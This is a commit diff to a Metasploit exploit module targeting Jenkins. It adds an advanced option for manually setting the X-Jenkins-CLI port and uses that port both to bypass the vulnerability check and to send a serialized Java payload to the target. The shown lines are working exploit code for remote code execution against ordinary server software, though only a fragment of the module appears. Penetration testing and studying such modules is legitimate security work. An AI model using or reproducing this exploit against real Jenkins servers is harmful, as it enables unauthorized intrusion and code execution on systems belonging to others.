Resolve #6546, support manual config for X-Jenkins-CLI-Port

Resolve #6546
bug/bundler_fix
wchen-r7 2016-02-08 18:16:48 -06:00
parent be8d6df093
commit d60dcf72f9
1 changed files with 10 additions and 2 deletions

View File

@ -52,10 +52,18 @@ class Metasploit3 < Msf::Exploit::Remote
OptString.new('TEMP', [true, 'Folder to write the payload to', '/tmp']),
Opt::RPORT('8080')
], self.class)
register_advanced_options([
OptPort.new('XJenkinsCliPort', [ false, 'The X-Jenkins-CLI port. If this is set, the TARGETURI option is ignored.'])
], self.class)
end
def cli_port
@jenkins_cli_port || datastore['XJenkinsCliPort']
end
def exploit
unless vulnerable?
unless cli_port || vulnerable?
fail_with(Failure::Unknown, "#{peer} - Jenkins is not vulnerable, aborting...")
end
invoke_remote_method(set_payload)
@ -155,7 +163,7 @@ class Metasploit3 < Msf::Exploit::Remote
def invoke_remote_method(serialized_java_stream)
begin
socket = connect(true, {'RPORT' => @jenkins_cli_port})
socket = connect(true, {'RPORT' => cli_port})
print_status 'Sending headers...'
socket.put(read_bin_file('serialized_jenkins_header'))